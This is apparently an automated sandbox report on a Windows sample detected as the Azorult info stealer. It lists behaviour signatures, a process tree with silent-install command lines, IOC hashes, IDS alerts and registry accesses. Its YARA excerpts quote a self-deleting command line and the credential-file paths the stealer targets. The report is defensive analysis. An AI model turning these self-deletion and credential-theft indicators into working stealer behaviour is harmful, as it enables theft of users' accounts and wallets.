Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe

Overview

General Information

Sample Name:B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
Analysis ID:813135
MD5:894fce964d09231b2b271fbf5afd4806
SHA1:bf0c85400eef6e222b41eed1f02345c6b00c1dfa
SHA256:b7cfd1d0aad8b5d5db5c17da0519b1d18ec7663699f2b8fedd0628e2bfacb6e5
Tags:AZORultexe
Infos:

Detection

Azorult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Azorult Info Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Generic Dropper
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Creates multiple autostart registry keys
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Binary is likely a compiled AutoIt script file
May check the online IP address of the machine
Tries to detect virtualization through RDTSC time measurements
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
Obfuscated command line found
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Queries keyboard layouts
PE file contains more sections than normal
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates COM task schedule object (often to register a task for autostart)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Installs a global mouse hook
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

  • System is w10x64
  • B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe (PID: 4884 cmdline: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe MD5: 894FCE964D09231B2B271FBF5AFD4806)
    • cexplorer.exe (PID: 1952 cmdline: "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP- MD5: B2E5A8FE3CA4F0CD681B5662F972EA5F)
      • cexplorer.tmp (PID: 1840 cmdline: "C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP- MD5: 729BC0108BCD7EC083DFA83D7A4577F2)
        • ChameleonExplorer.exe (PID: 4900 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister MD5: 92A3D0847FC622B31F2D0C273A676C0E)
        • ChameleonExplorer.exe (PID: 6052 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer MD5: 92A3D0847FC622B31F2D0C273A676C0E)
        • ChameleonFolder.exe (PID: 3624 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
          • conhost.exe (PID: 3236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • ChameleonExplorer.exe (PID: 2792 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update MD5: 92A3D0847FC622B31F2D0C273A676C0E)
    • update.exe (PID: 688 cmdline: "C:\Users\user\AppData\Roaming\update.exe" MD5: CF1EDC23E7EB941A4231A322C08C22B4)
      • update.exe (PID: 4760 cmdline: C:\Users\user\AppData\Roaming\update.exe" MD5: CF1EDC23E7EB941A4231A322C08C22B4)
  • ChameleonFolder.exe (PID: 5876 cmdline: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
    • ChameleonFolder64.exe (PID: 1280 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 66670 MD5: 246AAA95ABDDFD76F9166A2DAA9F2D73)
  • ChameleonExplorer.exe (PID: 4644 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup MD5: 92A3D0847FC622B31F2D0C273A676C0E)
    • ChameleonFolder.exe (PID: 6140 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 676 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 4864 cmdline: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 3128 cmdline: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonExplorer.exe (PID: 3112 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup MD5: 92A3D0847FC622B31F2D0C273A676C0E)
  • ChameleonFolder.exe (PID: 5740 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 5780 cmdline: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dllJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backupJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
          00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
            00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Azorult_38fce9eaunknownunknown
            • 0x193f0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
            • 0xd564:$a2: %APPDATA%\.purple\accounts.xml
            • 0xdcac:$a3: %TEMP%\curbuf.dat
            • 0x18dd0:$a4: PasswordsList.txt
            • 0x14128:$a5: Software\Valve\Steam
            00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
              00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
                Click to see the 10 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                20.2.update.exe.29b6000.1.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
                  20.2.update.exe.29b6000.1.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
                    20.2.update.exe.29b6000.1.unpackWindows_Trojan_Azorult_38fce9eaunknownunknown
                    • 0x187f0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
                    • 0xc964:$a2: %APPDATA%\.purple\accounts.xml
                    • 0xd0ac:$a3: %TEMP%\curbuf.dat
                    • 0x181d0:$a4: PasswordsList.txt
                    • 0x13528:$a5: Software\Valve\Steam
                    20.2.update.exe.29b6000.1.unpackAzorult_1Azorult Payloadkevoreilly
                    • 0x16773:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
                    • 0x1147c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
                    20.2.update.exe.400000.0.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
                      Click to see the 7 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.351.15.219.8649709802029465 02/22/23-08:09:18.995725
                      SID:2029465
                      Source Port:49709
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.351.15.219.8649708802029465 02/22/23-08:09:18.626942
                      SID:2029465
                      Source Port:49708
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\update.exeAvira: detection malicious, Label: HEUR/AGEN.1225881
                      Multi AV Scanner detection for submitted file
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeVirustotal: Detection: 71%Perma Link
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeReversingLabs: Detection: 76%
                      Antivirus / Scanner detection for submitted sample
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeAvira: detected
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\update.exeReversingLabs: Detection: 80%
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\update.exeJoe Sandbox ML: detected
                      Source: 20.2.update.exe.29b6000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.184.84:443 -> 192.168.2.3:49705 version: TLS 1.2
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
